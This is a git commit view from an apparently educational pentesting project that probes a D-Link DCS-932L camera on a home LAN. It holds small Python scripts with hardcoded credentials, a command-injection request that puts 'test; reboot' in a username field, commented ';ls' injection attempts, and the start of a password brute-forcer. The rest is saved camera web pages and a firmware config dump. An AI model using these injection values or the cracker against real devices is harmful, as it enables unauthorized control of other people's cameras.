beppe/college-pentesting
1
0
Fork 0
mirror of https://github.com/bvanroll/college-pentesting.git synced 2025-08-28 11:32:40 +00:00
Code Issues Packages Projects Releases Wiki Activity

idk man

Browse Source
This commit is contained in:
Beppe Vanrolleghem
2018-11-24 05:56:26 +01:00
parent 36aeaa07f6
commit 78a96b6cfa
21 changed files with 1121 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

110
bot.py Normal file
View File

@@ -0,0 +1,110 @@
#import urllib
#
#password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
#
#top_level_url = "http://192.168.1.119"
#password_mgr.add_password(None, top_level_url, "admin", "Azerty123")
#
#handler = urllib.request.HTTPBasicAuthHandler(password_mgr)
#
#opener = urllib.request.build_opener(handler)
#
#opener.open("http://192.168.1.119")
#
#urllib.request.install_opener(opener)
#
#temp = urllib.request.urlopen("http://192.168.1.119")
import urllib.request
import base64
import requests
def getReq(url, user, passw, headers=None):
try:
req= urllib.request.Request(url)
credentials = ('%s:%s' % (user, passw))
encoded_credentials = base64.b64encode(credentials.encode('ascii'))
req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii"))
if headers:
for h in headers:
req.add_header(h[1], h[2])
with urllib.request.urlopen(req) as response:
return str(response.read())
except urllib.error.HTTPError as e:
return str(e)
def postReq(url, user, passw, data, headers=None):
try:
d = urllib.parse.urlencode(data, quote_via=urllib.parse.quote_plus).encode('utf-8')
req= urllib.request.Request(url)
credentials = ('%s:%s' % (user, passw))
encoded_credentials = base64.b64encode(credentials.encode('ascii'))
req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii"))
if headers:
for h in headers:
req.add_header(h[0], h[1])
print(req.headers)
print(req.get_full_url())
with urllib.request.urlopen(req) as response:
return str(response.read())
except urllib.error.HTTPError as e:
return str(e)
base_url = "http://192.168.1.119/"
username = "admin"
password = "Azerty123"
data = {
"ReplySuccessPage":"home.htm",
"ReplyErrorPage":"home.htm",
"WebLanguage":"4",
"ConfigSystemLanguage":"Save"
}
#headers = {
# "Host": "192.168.1.119",
# "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
# "Accept-Language": "en-US,en;q=0.5",
# "Accept-Encoding": "gzip, deflate",
# "Referer": "http://192.168.1.119/home.htm",
# "Content-Type": "application/x-www-form-urlencoded",
# "Content-Length": "87",
# "Connection": "keep-alive",
# "Upgrade-Insecure-Requests": "1"
#}
headers = [
("Host","192.168.1.119"),
("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0"),
("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
("Accept-Language","en-US,en;q=0.5"),
("Accept-Encoding","gzip, deflate"),
("Referer","http://192.168.1.119/home.htm"),
("Content-Type","application/x-www-form-urlencoded"),
("Content-Length","87"),
("Connection","keep-alive"),
("Upgrade-Insecure-Requests","1")
]
posturl = "/home.thm"
print("post request on setSystemLanguage:\n " + postReq("http://192.168.1.119"+posturl,username,password,data, headers))
#print("\n\n\n")
#data = {"ReplySuccesPage":";ls","ReplyErrorPage":";ls"}
#posturl = ""
#
#print("post request on index:\n "+postReq(base_url, username, password, data))

150
conn Normal file
View File

@@ -0,0 +1,150 @@
<html>
<head>
<link rel="stylesheet" rev="stylesheet" href="dlink.css?cidx=1473430292" type="text/css">
<title>D-Link Corporation. | WIRELESS INTERNET CAMERA | HOME</title>
<meta http-equiv="X-UA-Compatible" content="requiresActiveX=true">
<meta content="text/html; charset=windows-1252" http-equiv=Content-Type>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache">
<meta HTTP-EQUIV="Expires" CONTENT="-1">
<script language="Javascript" SRC="function.js?cidx=1473430292"></script>
<script language="Javascript">
//if (top != self) {
// top.location = self.location;
//}
</script>
<script language="Javascript">
function InitAUTO()
{
frm0 = document.forms[0];
frm1 = document.forms[1];
frm0.WebLanguageSel.value = frm1.WebLanguage.value;
}
function ClickSubmit()
{
javascript:document.forms[1].submit();
}
</script>
</head>
<body topmargin="1" leftmargin="0" rightmargin="0" bgcolor="#757575">
<FORM ACTION="/top.htm" METHOD="POST" autocomplete="off">
<table id="header_container" border="0" cellpadding="5" cellspacing="0" width="838" align="center">
<tr>
<td width="100%">Product: <a href="http://www.dlink.com/" target="_blank">DCS-932LB</a></td>
<td align="right" nowrap></td>
<td align="right" nowrap>Firmware version: 2.14 &nbsp;</td>
</tr>
</table>
<div id="title_container">
<table id="topnav_container" border="0" cellpadding="0" cellspacing="0" width="838" align="center">
<tr><td align="center" valign="middle"><img src="title.gif"></td></tr>
</table>
</div>
<table id="index_container" border="0" cellpadding="2" cellspacing="1" width="838" align="center" bgcolor="#FFFFFF">
<tr id="topnav_container">
<td><img src="devmodel.jpg?cidx=DCS-932LB1"></td>
<td id="topnavon"><a href="home.htm">Live Video</a></td>
<td id="topnavoff"><a href="wizard.htm">Setup</a></td>
<td id="topnavoff"><a href="advanced.htm">Maintenance</a></td>
<td id="topnavoff"><a href="stsdev.htm">Status</a></td>
<td id="topnavoff"><a href="support.htm">Help</a></td>
<td id="index_space" width="640" style="display:none;"></td>
</tr>
<tr><td colspan=6 height=1 bgcolor="#ffffff"></td></tr>
</table>
<table id="space_container" border="0" cellpadding="0" cellspacing="0" width="838" align="center" bgcolor="#FFFFFF" bordercolordark="#FFFFFF" height=50%>
<tr><td height=1 bgcolor="#000000"></td></tr>
<tr><td>
<table id="data_container" border="0" cellpadding="0" cellspacing="0" width="838" align="center" bgcolor="#FFFFFF" bordercolordark="#FFFFFF" height=100%>
<tr>
<td valign="top" width="131" height="100%" align="right">
<!-- === BEGIN SIDENAV === -->
<table border="0" cellpadding="1" cellspacing="1" height=100% bgcolor="#FFFFFF">
<tr id="sidenav_container"><td id="sidenavon"><a href="home.htm">Camera</a></td></tr>
<tr id="sidenav_container"><td id="sidenavoff"><a href="logout.htm">Logout</a></td></tr>
<tr id="sidenav_container" height=100%><td id="sidenavoff" valign="top">
<div style="padding: 39px 0px 0px 4px; font-size: 11px;"><font color=white>Language :</font></div>
&nbsp;<SELECT id="WebLanguageSel" size="1" onchange="document.forms[1].WebLanguage.value = this.value;ClickSubmit()">
<OPTION value="0" selected>English</OPTION>
<OPTION value="1">&#31616;&#20307;&#20013;&#25991;</OPTION>
<OPTION value="2">&#32321;&#39636;&#20013;&#25991;</OPTION>
<OPTION value="3">Deutsch</OPTION>
<OPTION value="4">fran&ccedil;ais</OPTION>
<OPTION value="5">Italiano</OPTION>
<OPTION value="6">Espa&ntilde;ol</OPTION>
<OPTION value="7">&#54620;&#44397;&#51032;</OPTION>
</SELECT>
</td></tr>
</table>
<!-- === END SIDENAV === -->
</td>
<td valign="top" id="maincontent_container" height="420">
<table height="420" width=100% border="0" cellpadding="0" cellspacing="0" bgcolor="white">
<tr><td>
<div id="maincontent">
<!-- === BEGIN MAINCONTENT === -->
<div id="box_header">
<h1>Camera</h1>
This section shows your IP camera's live video. You can control your settings using the buttons below.<br>
Current resolution is 320x240.
</div>
<div class="box">
<h2>Function</h2>
<a href="aview.htm" style="padding: 0px 3px 0px 0px;TEXT-DECORATION: none" style="padding: 0px 3px 0px 0px;TEXT-DECORATION: none"><img src="radiooff.gif" border="0"></a>ActiveX&nbsp;
<a href="jview.htm" style="padding: 0px 3px 0px 0px;TEXT-DECORATION: none" style="padding: 0px 3px 0px 0px;TEXT-DECORATION: none"><img src="radiooff.gif" border="0"></a>Java&nbsp;
</div>
<div class="box">
<h2>Live Video</h2>
<table cellpadding="2" cellspacing="0" border="0" width="534" bgcolor="white" bordercolor="#000000">
<tr><td align="center">
<table bgcolor=black BORDER=0 CELLSPACING=0 CELLPADDING=0>
<tr style="height: 17px">
<td nowrap><font color=white>DCS-932LB<br></font></td>
<td nowrap align=right valign=top>&nbsp;&nbsp;<font color=white>11-20-2018 04:44:35 PM</font></td>
</tr>
<tr>
<td colspan=2 align=center bgcolor="white">
<IMG src="image.jpg?cidx=1525915613" BORDER="0">
</td>
</tr>
</table>
</td></tr>
</table>
</div>
<!-- === END MAINCONTENT === -->
</div>
</td></tr>
<tr height=100%><td></td></tr>
</table>
</td>
</tr>
</table>
</td></tr></table>
<table id="footer_container" border="0" cellpadding="0" cellspacing="0" width="838" align="center">
<tr>
<td width="125" align="center">&nbsp;&nbsp;<img src="security.gif" width="114" height="35"></td>
<td width="10">&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table><br>
<div align="center"><FONT color=#ffffff>Copyright <script language="Javascript">Copyright(2010);</script>, D-Link Corporation / D-Link Systems, Inc. All rights reserved.</font></div>
<br>
</form>
</body>
<FORM ACTION="/setSystemLanguage" METHOD="POST" autocomplete="off">
<input type="hidden" name="ReplySuccessPage" value="top.htm">
<input type="hidden" name="ReplyErrorPage" value="top.htm">
<input type="hidden" name="WebLanguage" value="0">
<input type="hidden" name="ConfigSystemLanguage" value="Save">
</Form>
<FORM id="redir" name="redir" ACTION="/" METHOD="POST" autocomplete="off">
<input type="hidden" name="ReplySuccessPage" value="">
<input type="hidden" name="ReplyErrorPage" value="">
</Form>
<script language="Javascript">
InitAUTO();
</script>
</html>

BIN
dissasembleRalinkInit/ralink_init.id0
View File

Binary file not shown.

0
dissasembleRalinkInit/ralink_init.nam
View File

BIN
dlinkHacker/__pycache__/connections.cpython-37.pyc Normal file
View File

Binary file not shown.

5
dlinkHacker/commandInjection.py Normal file
View File

@@ -0,0 +1,5 @@
from connections import *
print(postReq("http://192.168.1.219/setSystemAddUser", "admin", "Azerty123", {"ReplySuccessPage":"advanced.htm", "ReplyErrorPage":"errradv.htm","SessionKey":"1543011420", "UserName": "test; reboot", "Password":"aaaaaaaaaaaaaaa"}))

42
dlinkHacker/connections.py Normal file
View File

@@ -0,0 +1,42 @@
import urllib.request
import base64
def getReq(url, user, passw, headers=None):
try:
req= urllib.request.Request(url)
credentials = ('%s:%s' % (user, passw))
encoded_credentials = base64.b64encode(credentials.encode('ascii'))
req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii"))
if headers:
for h in headers:
req.add_header(h[1], h[2])
with urllib.request.urlopen(req) as response:
return str(response.read())
except urllib.error.HTTPError as e:
return str(e)
#format for data {item:content, item:content}
def postReq(url, user, passw, data, headers=None):
try:
d = urllib.parse.urlencode(data, quote_via=urllib.parse.quote_plus).encode('utf-8')
req= urllib.request.Request(url)
credentials = ('%s:%s' % (user, passw))
encoded_credentials = base64.b64encode(credentials.encode('ascii'))
req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii"))
if headers:
for h in headers:
req.add_header(h[0], h[1])
print(req.headers)
print(req.get_full_url())
with urllib.request.urlopen(req) as response:
return str(response.read())
except urllib.error.HTTPError as e:
return str(e)

19
dlinkHacker/hackdlink.py Normal file
View File

@@ -0,0 +1,19 @@
import sys
#dlinks authentication seems very hard to crack, but i can write a cracker either way
#so parameters for the password,
#between 6 and 20 chars long
#numbers characters (upper and lower case) and a bunch of symbols
#encoded in base64
#i'"ve written a get request in a connection manager if i get an httpError, i can actually check if it's a bad password
from connections import *
l = "abcdefghijklmnopqrstuvwxyz"
L = l.upper()
n = "1234567890"
c = "&é@#'(è!çà){}-_+=%£,.:;"
if len(sys.argv):
print("")
else:
print("")
print(getReq("http://192.168.1.119/image/jpeg.cgi", "", ""))

69
dlinkHacker/tests.py Normal file
View File

@@ -0,0 +1,69 @@
#import urllib
#
#password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
#
#top_level_url = "http://192.168.1.119"
#password_mgr.add_password(None, top_level_url, "admin", "Azerty123")
#
#handler = urllib.request.HTTPBasicAuthHandler(password_mgr)
#
#opener = urllib.request.build_opener(handler)
#
#opener.open("http://192.168.1.119")
#
#urllib.request.install_opener(opener)
#
#temp = urllib.request.urlopen("http://192.168.1.119")
from connections import *
base_url = "http://192.168.1.215/"
username = "admin"
password = "Azerty123"
data = {
"ReplySuccessPage":"home.htm",
"ReplyErrorPage":"home.htm",
"WebLanguage":"4",
"ConfigSystemLanguage":"Save"
}
#headers = {
# "Host": "192.168.1.119",
# "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
# "Accept-Language": "en-US,en;q=0.5",
# "Accept-Encoding": "gzip, deflate",
# "Referer": "http://192.168.1.119/home.htm",
# "Content-Type": "application/x-www-form-urlencoded",
# "Content-Length": "87",
# "Connection": "keep-alive",
# "Upgrade-Insecure-Requests": "1"
#}
headers = [
("Host","192.168.1.119"),
("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0"),
("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),
("Accept-Language","en-US,en;q=0.5"),
("Accept-Encoding","gzip, deflate"),
("Referer","http://192.168.1.119/home.htm"),
("Content-Type","application/x-www-form-urlencoded"),
("Content-Length","87"),
("Connection","keep-alive"),
("Upgrade-Insecure-Requests","1")
]
posturl = "/home.thm"
print("post request on setSystemLanguage:\n " + postReq("http://192.168.1.119"+posturl,username,password,data, headers))
#print("\n\n\n")
#data = {"ReplySuccesPage":";ls","ReplyErrorPage":";ls"}
#posturl = ""
#
#print("post request on index:\n "+postReq(base_url, username, password, data))

564
etc_ro.Wireless.RT2860AP.RT2869_default_vlan Normal file
View File

@@ -0,0 +1,564 @@
#The word of "Default" must not be removed
Default
WebInit=1
#WiFiTest=0
#HostName=ralink
#Login=admin
#Password=admin
OperationMode=0
Platform=RT5350
Telnet=0
CountryRegion=5
CountryRegionABand=7
CountryCode=NA
#wanConnectionMode=DHCP
#wan_ipaddr=192.168.1.1
#wan_netmask=255.255.255.0
#wan_gateway=192.168.1.254
#wan_primary_dns=192.168.1.5
#wan_secondary_dns=168.95.1.1
#wan_pppoe_user=pppoe_user
#wan_pppoe_pass=pppoe_passwd
#wan_l2tp_server=l2tp_server
#wan_l2tp_user=l2tp_user
#wan_l2tp_pass=l2tp_passwd
#wan_l2tp_mode=0
#wan_l2tp_ip=192.168.1.1
#wan_l2tp_netmask=255.255.255.0
#wan_l2tp_gateway=192.168.1.254
#wan_pptp_server=pptp_server
#wan_pptp_user=pptp_user
#wan_pptp_pass=pptp_passwd
#wan_pptp_mode=0
#wan_pptp_ip=192.168.1.1
#wan_pptp_netmask=255.255.255.0
#wan_pptp_gateway=192.168.1.254
#lan_ipaddr=2.65.87.200
#lan_netmask=255.0.0.0
#dhcpEnabled=0
#dhcpStart=10.10.10.100
#dhcpEnd=10.10.10.200
#dhcpMask=255.255.255.0
#dhcpPriDns=10.10.10.251
#dhcpSecDns=168.95.1.1
#dhcpGateway=10.10.10.254
#dhcpLease=86400
#stpEnabled=0
#lltdEnabled=0
#igmpEnabled=0
#natEnabled=0
#IPPortFilterEnable=0
#IPPortFilterRules=
#PortForwardEnable=0
#PortForwardRules=
#MacFilterEnable=0
#MacFilterRules=
#DefaultFirewallPolicy=1
#DMZEnable=0
#DMZIPAddress=
#TZ=
#NTPServerIP=
#NTPSync=
#DDNSProvider=
#DDNS=
#DDNSAccount=
#DDNSPassword=
BssidNum=1
#SSID1=RT305x_AP_andy
#WirelessMode=9
#TxRate=0
#Channel=6
BasicRate=15
#BeaconPeriod=100
DtimPeriod=1
TxPower=100
DisableOLBC=0
BGProtection=0
#TxAntenna=
#RxAntenna=
#TxPreamble=0
RTSThreshold=2347
FragThreshold=2346
TxBurst=1
PktAggregate=1
#TurboRate=0
WmmCapable=1
APAifsn=3;7;1;1
APCwmin=4;4;3;2
APCwmax=6;10;4;3
APTxop=0;0;94;47
APACM=0;0;0;0
BSSAifsn=3;7;2;2
BSSCwmin=4;4;3;2
BSSCwmax=10;10;4;3
BSSTxop=0;0;94;47
BSSACM=0;0;0;0
AckPolicy=0;0;0;0
APSDCapable=0
DLSCapable=0
NoForwarding=0
NoForwardingBTNBSSID=0
#HideSSID=0
ShortSlot=1
AutoChannelSelect=0
#SecurityMode=0
#VLANEnable=0
#VLANName=
#VLANID=0
#VLANPriority=0
#########################################
# Cannot remove these WscXXX Parameters #
#########################################
WscConfMode=0
WscConfStatus=2
WscAKMP=1
WscConfigured=0
WscModeOption=0
WscActionIndex=9
WscPinCode=
WscRegResult=1
WscUseUPnP=1
WscUseUFD=0
WscSSID=RalinkInitialAP
WscKeyMGMT=WPA-EAP
WscConfigMethod=138
WscAuthType=1
WscEncrypType=1
WscNewKey=scaptest
IEEE8021X=0
IEEE80211H=0
CSPeriod=6
PreAuth=0
#AuthMode=OPEN
#EncrypType=NONE
RekeyInterval=3600
RekeyMethod=DISABLE
PMKCachePeriod=10
#WPAPSK1=12345678
#DefaultKeyID=1
#Key1Type=0
#Key1Str1=
#Key2Type=0
#Key2Str1=
#Key3Type=0
#Key3Str1=
#Key4Type=0
#Key4Str1=
#HSCounter=0
HT_HTC=0
HT_RDG=0
#HT_LinkAdapt=0
HT_OpMode=0
HT_MpduDensity=5
HT_EXTCHA=1
#HT_BW=0
HT_AutoBA=1
HT_BADecline=0
HT_AMSDU=0
HT_BAWinSize=64
HT_GI=1
HT_STBC=1
HT_MCS=33
HT_PROTECT=1
#HT_MIMOPS=3
HT_40MHZ_INTOLERANT=0
HT_TxStream=1
HT_RxStream=1
#NintendoCapable=0
#AccessPolicy0=0
#AccessControlList0=
#AccessPolicy1=0
#AccessControlList1=
#AccessPolicy2=0
#AccessControlList2=
#AccessPolicy3=0
#AccessControlList3=
#WdsEnable=0
#WdsEncrypType=NONE
#WdsList=
#WdsKey=
WirelessEvent=0
RADIUS_Server=
RADIUS_Port=1812
RADIUS_Key=
#RADIUS_Acct_Server=
#RADIUS_Acct_Port=1813
#RADIUS_Acct_Key=
session_timeout_interval=0
#idle_timeout_interval=0
#staWirelessMode=9
###################################
## ED CCA Profile ##
###################################
EDCCA_AP_STA_TH=1
EDCCA_AP_AP_TH=1
EDCCA_STA_SCANED_AP_TH=5
EDCCA_STA_CURRENT_CH_APS_TH=1
EDCCA_STA_RSSI_TH=-100
EDCCA_ED_TH=90
EDCCA_FALSE_CCA_TH=180
EDCCA_BLOCK_CHECK_TH=2
###################################
### IPCam Default Configuration ###
### Company: D-Link ###
### Model : DCS-930L ###
###################################
# System #
CameraName=DCS-930L
Location=
AdminID=admin
AdminPassword=
LEDControl=0
SnapshotURLAuthentication=0
# Date and Time #
DateTimeMode=1
TimeServerIPAddress=
TimeServerProtocol=0
TimeZone=0
TimeZoneIndex=0
Date=2014-01-01
Time=00:00:00
# User Access Control # ### UserValue=UserName/Password/Privilege ###
AccessControlEnable=0
User1=
User2=
User3=
User4=
User5=
User6=
User7=
User8=
User9=
User10=
User11=
User12=
User13=
User14=
User15=
User16=
User17=
User18=
User19=
User20=
User21=
User22=
User23=
User24=
User25=
User26=
User27=
User28=
User29=
User30=
User31=
User32=
User33=
User34=
User35=
User36=
User37=
User38=
User39=
User40=
User41=
User42=
User43=
User44=
User45=
User46=
User47=
User48=
User49=
User50=
User51=
User52=
User53=
User54=
User55=
User56=
User57=
User58=
User59=
User60=
User61=
User62=
User63=
User64=
# Image #
VideoResolution=1
CompressionRate=2
FrameRate=0
BrightnessControl=64
ContrastControl=64
SaturationControl=64
SharpnessControl=32
LightFrequency=1
Mirror=0
AntiFlickerEnable=0
ViewMode=0
VideoResolution264=3
FrameRate264=30
BitRate264=8
# Network # #IP Mode: 1-(Fixed), 4-(DHCP), 5-(PPPoE)#
IPAddressMode=1
IPAddress=2.65.87.200
SubnetMask=255.0.0.0
DefaultGateway=
PPPoEUserID=
PPPoEPassword=
DNSIPAddress1=
DNSIPAddress2=
DDNSEnable=0
DDNSProvider=
DDNSHostName=
DDNSUserName=
DDNSPassword=
DDNSTimeout=576
SecondHTTPPortEnable=3
SecondHTTPPort=80
UPnPEnable=1
UPnPPortForwarding=0
HTTPAuthentication=0
# Wireless #
ConnectionMode=0
SSID=Test-WPS-andy
WirelessChannel=6
TransmissionRate=0
WEPEncryption=4
WEPKeyFormat=0
Key1=
Key2=
Key3=
Key4=
TxKey=1
BeaconInterval=100
Preamble=0
AuthenticationType=2
PreSharedKey=PSK12345
WirelessDisable=0
WirelessMode=0
WirelessBW=0
APExtendName=0
APSSID=Test-Repeater-Andy
APSSIDHidden=0
APWEPEncryption=0
APWEPKeyFormat=0
APKey1=
APAuthenticationType=0
APPreSharedKey=PSK12345
APMaxClient=3
# FTP #
FTPHostAddress=
FTPPortNumber=21
FTPUserName=
FTPPassword=
FTPDirectoryPath=/
FTPPassiveMode=0
FTPScheduleEnable=0
FTPScheduleMode=0
FTPScheduleDay=
FTPScheduleTimeStart=00:00:00
FTPScheduleTimeStop=00:00:00
FTPScheduleVideoFrequencyMode=0
FTPScheduleFramePerSecond=1
FTPScheduleSecondPerFrame=1
FTPScheduleBaseFileName=
FTPScheduleFileMode=1
FTPScheduleMaxFileSequenceNumber=1024
FTPCreateFolderInterval=0
#FTPManualEnable=0
#FTPManualBaseFileName=
#FTPManualFileMode=
#FTPManualMaxFileSequenceNumber=
# E-Mail #
EmailSMTPServerAddress=
EmailSMTPPortNumber=25
EmailSenderAddress=
EmailReceiverAddress=
EmailUserName=
EmailPassword=
EmailTLSAuthentication=0
EmailScheduleEnable=0
EmailScheduleMode=0
EmailScheduleDay=
EmailScheduleTimeStart=00:00:00
EmailScheduleTimeStop=00:00:00
EmailScheduleInterval=300
EmailMotionMode=1
EmailMotionFrameInterval=1
#EmailManualEnable=0
#EmailManualInterval=300
# Audio #
AudioEnable=1
AudioVolume=80
AudioCodec=0
AudioSampleBit=1
AudioSampleRate=1
SpeakerEnable=1
SpeakerVolume=80
# MotionDetection #
MotionDetectionEnable=0
MotionDetectionBlockSet=0000000000000000000000000
MotionDetectionSensitivity=90
MotionDetectionScheduleMode=0
MotionDetectionScheduleDay=
MotionDetectionScheduleTimeStart=00:00:00
MotionDetectionScheduleTimeStop=00:00:00
# SoundDetection #
SoundDetectionEnable=0
SoundDetectionDB=90
SoundDetectionScheduleMode=0
SoundDetectionScheduleDay=
SoundDetectionScheduleTimeStart=00:00:00
SoundDetectionScheduleTimeStop=00:00:00
# DLink15 #
DLink15Register=0
DLink15Enable=1
DLink15Remote=0
DLink15Argv1=1
# PanTilt # ### Value=PositionName/Pan/Tilt ###
SetPosition1=
SetPosition2=
SetPosition3=
SetPosition4=
SetPosition5=
SetPosition6=
SetPosition7=
SetPosition8=
SetPosition9=
SetPosition10=
SetPosition11=
SetPosition12=
SetPosition13=
SetPosition14=
SetPosition15=
SetPosition16=
SetPosition17=
SetPosition18=
SetPosition19=
SetPosition20=
SetPosition21=
SetPosition22=
SetPosition23=
SetPosition24=
HomePosition=
PanSingleMoveDegree=5
TiltSingleMoveDegree=5
DwellingTime=5
PatrolTimes=1
# Web Language #
DefaultLanguage=0
CurrentLanguage=0
# Day/Night Mode #
DayNightMode=0
IRLedScheduleSunStart=00:00
IRLedScheduleSunEnd=00:00
IRLedScheduleMonStart=00:00
IRLedScheduleMonEnd=00:00
IRLedScheduleTueStart=00:00
IRLedScheduleTueEnd=00:00
IRLedScheduleWedStart=00:00
IRLedScheduleWedEnd=00:00
IRLedScheduleThuStart=00:00
IRLedScheduleThuEnd=00:00
IRLedScheduleFriStart=00:00
IRLedScheduleFriEnd=00:00
IRLedScheduleSatStart=00:00
IRLedScheduleSatEnd=00:00
# LinknLook #
#LnLEnable=1
#LnLLLSrvIP=0.0.0.0
#LnLLLDomain=cam.linknlook.net
#LnLLLAudioCodec=5
#LnLhid=00000000
#LnLDbgLevel=0
#LnLDbgSrvIP=0.0.0.0
#LnLDbgToken=
#LnLAliasStatus=0
#LnLAliasName=null
#LnLLastAliasName=null
#LnLPxySrvName=null
#LnLPxySrvPort=8080
# Facebook #
#FacebookEmail=
# Local Recording #
#LocalRecordPath=
#LocalRecordMaxTime=5
# SD Card Recording #
#SDCardScheduleEnable=0
#SDCardScheduleMode=0
#SDCardScheduleDay=
#SDCardScheduleTimeStart=00:00:00
#SDCardScheduleTimeStop=00:00:00
#SDCardScheduleInterval=60
#SDCardFullAction=0
#SDCardScheduleEnableVideo=0
#SDCardScheduleModeVideo=0
#SDCardScheduleDayVideo=
#SDCardScheduleTimeStartVideo=00:00:00
#SDCardScheduleTimeStopVideo=00:00:00
#SDCardMaxRecordTimeVideo=5
#SDCardFullActionVideo=0
#SDCardRecordingFormatVideo=0
# Cifs Recording #
#CifsServerFolder=
#CifsUserName=
#CifsPassword=
#CifsScheduleEnable=0
#CifsScheduleMode=0
#CifsScheduleDay=
#CifsScheduleTimeStart=00:00:00
#CifsScheduleTimeStop=00:00:00
#CifsMaxRecordTime=5
#CifsFullAction=0
# OSD #
OSDEnable=0
OSDColorY=59
OSDColorU=99
OSDColorV=250
# Bonjour #
BonjourEnable=1
BonjourName=DCS-930L
# Daylight saving time DST #
DSTEnable=0
DSTOffset=5
DSTStartMonth=0
DSTStartWeek=0
DSTStartDay=0
DSTStartTime=0
DSTEndMonth=0
DSTEndWeek=0
DSTEndDay=0
DSTEndTime=0
# 3G Internet
#Internet3GAutoConfig=0
#Internet3GUserName=
#Internet3GPassword=
#Internet3GDialNumber=
#Internet3GAPN=
#Internet3GAuthentication=0
#Internet3GPINCode=
#Internet3GMTU=1500
# Upgrade F/W Status
LastDownloadStatus=0
# FPS Control
FPSEnable=0
# Low Light Control
LowLightEnable=1
# H264 Stream Mode
H264StreamMode=1
# PT Test
PTTestTimer=0
PTTestResultPanLimit=0
PTTestResultTiltLimit=0
PTTestResultPanLost=0
PTTestResultTiltLost=0
# SSL Certificate
SSLCertificate1=
SSLCertificate2=
# Light Sensor Control
LightSensorControl=3
# UPnPuuid
UPnPuuid=ae67e622-7a66-465e-bab0-00ff32654199

BIN
network discovery.pcapng Normal file
View File

Binary file not shown.

9
readme.md
View File

@@ -627,4 +627,13 @@ so this file has to be usefull since it has this set in it, i'm copying it to th
dus
blijkbaar is er een speciale authenticatie via http aanwezig op dit apparaat, en hij wijgert een pak url's die ik probeer om andere shit te starte bv, dus wa ik ga probere, om een cracker te schrijve die alle passwoorden afgaat
some ports are also open
port 80
port 443
port 8385

1
rootdesc.xml Normal file
View File

@@ -0,0 +1 @@
<?xml version="1.0"?><root xmlns="urn:schemas-upnp-org:device-1-0"><specVersion><major>1</major><minor>0</minor></specVersion><URLBase>http://192.168.1.219:8633</URLBase><device><deviceType>urn:schemas-upnp-org:device:Basic:1.0</deviceType><friendlyName>DCS-932LB(192.168.1.219:80)</friendlyName><manufacturer>D-Link</manufacturer><manufacturerURL>http://www.dlink.com</manufacturerURL><modelDescription>Wireless Internet Camera</modelDescription><modelName>DCS-932L_Rev_B</modelName><modelNumber>DCS-932L_Rev_B</modelNumber><modelURL>http://www.dlink.com</modelURL><UDN>uuid:ae67e622-7a66-465e-bab0-b0c554462ab2</UDN><UPC></UPC><serviceList><service><serviceType>urn:cellvision:service:Null:1</serviceType><serviceId>urn:cellvision:serviceId:RootNull</serviceId><SCPDURL>/rootService.xml</SCPDURL><controlURL>/rootControl</controlURL><eventSubURL>/rootEvent</eventSubURL></service></serviceList><presentationURL>http://192.168.1.219:80</presentationURL></device></root>

BIN
safarimitm.pcapng Normal file
View File

Binary file not shown.

150
test Normal file
View File

@@ -0,0 +1,150 @@
<html>
<head>
<link rel="stylesheet" rev="stylesheet" href="dlink.css?cidx=1473430292" type="text/css">
<title>D-Link Corporation. | WIRELESS INTERNET CAMERA | HOME</title>
<meta http-equiv="X-UA-Compatible" content="requiresActiveX=true">
<meta content="text/html; charset=windows-1252" http-equiv=Content-Type>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache">
<meta HTTP-EQUIV="Expires" CONTENT="-1">
<script language="Javascript" SRC="function.js?cidx=1473430292"></script>
<script language="Javascript">
//if (top != self) {
// top.location = self.location;
//}
</script>
<script language="Javascript">
function InitAUTO()
{
frm0 = document.forms[0];
frm1 = document.forms[1];
frm0.WebLanguageSel.value = frm1.WebLanguage.value;
}
function ClickSubmit()
{
javascript:document.forms[1].submit();
}
</script>
</head>
<body topmargin="1" leftmargin="0" rightmargin="0" bgcolor="#757575">
<FORM ACTION="/top.htm" METHOD="POST" autocomplete="off">
<table id="header_container" border="0" cellpadding="5" cellspacing="0" width="838" align="center">
<tr>
<td width="100%">Product: <a href="http://www.dlink.com/" target="_blank">DCS-932LB</a></td>
<td align="right" nowrap></td>
<td align="right" nowrap>Firmware version: 2.14 &nbsp;</td>
</tr>
</table>
<div id="title_container">
<table id="topnav_container" border="0" cellpadding="0" cellspacing="0" width="838" align="center">
<tr><td align="center" valign="middle"><img src="title.gif"></td></tr>
</table>
</div>
<table id="index_container" border="0" cellpadding="2" cellspacing="1" width="838" align="center" bgcolor="#FFFFFF">
<tr id="topnav_container">
<td><img src="devmodel.jpg?cidx=DCS-932LB1"></td>
<td id="topnavon"><a href="home.htm">Live Video</a></td>
<td id="topnavoff"><a href="wizard.htm">Setup</a></td>
<td id="topnavoff"><a href="advanced.htm">Maintenance</a></td>
<td id="topnavoff"><a href="stsdev.htm">Status</a></td>
<td id="topnavoff"><a href="support.htm">Help</a></td>
<td id="index_space" width="640" style="display:none;"></td>
</tr>
<tr><td colspan=6 height=1 bgcolor="#ffffff"></td></tr>
</table>
<table id="space_container" border="0" cellpadding="0" cellspacing="0" width="838" align="center" bgcolor="#FFFFFF" bordercolordark="#FFFFFF" height=50%>
<tr><td height=1 bgcolor="#000000"></td></tr>
<tr><td>
<table id="data_container" border="0" cellpadding="0" cellspacing="0" width="838" align="center" bgcolor="#FFFFFF" bordercolordark="#FFFFFF" height=100%>
